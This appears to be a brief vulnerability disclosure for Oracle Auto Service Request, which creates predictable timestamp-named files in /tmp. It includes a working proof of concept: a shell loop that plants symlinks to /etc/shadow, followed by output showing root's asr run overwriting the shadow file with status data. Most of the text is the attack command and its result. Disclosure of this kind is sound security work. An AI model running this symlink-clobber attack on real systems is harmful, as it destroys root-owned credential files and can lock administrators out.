Oracle Auto Service Request File Clobber

`Oracle Auto Service Request software package creates files insecurely in /tmp using time stamps instead of mkstemp(). You can clobber root owned files if you know when around the time the root administrator will be using this utility.  
  
  
  
[larry@oracle-os-lab01 tmp]$ for x in `seq 500 999`; do ln -s /etc/shadow /tmp/status1_020213003$x; done  
  
  
root executes the asr command:  
  
[root@oracle-os-lab01 bin]# ./asr  
  
register OR register [-e asr-manager-relay-url]: register ASR  
unregister : unregister ASR  
show_reg_status : show ASR registration status  
test_connection : test connection to Oracle  
.  
.  
.  
  
version : show asr script version  
exit  
help : display a list of commands  
? : display a list of commands  
  
  
asr>   
  
/etc/shadow is now overwritten with the contents of /tmp/status1_020213003722  
root # cat /etc/shadow  
  
id State Bundle  
68 ACTIVE com.sun.svc.asr.sw_4.3.1  
Fragments=69, 70  
69 RESOLVED com.sun.svc.asr.sw-frag_4.3.1  
Master=68  
70 RESOLVED com.sun.svc.asr.sw-rulesdefinitions_4.3.1  
Master=68  
72 ACTIVE com.sun.svc.asr.sw.http.AsrHttpReceiver_1.0.0  
Fragments=73  
73 RESOLVED com.sun.svc.asr.sw.http-frag_1.0.0  
Master=72  
  
67 ACTIVE com.sun.svc.ServiceActivation_4.3.1  
`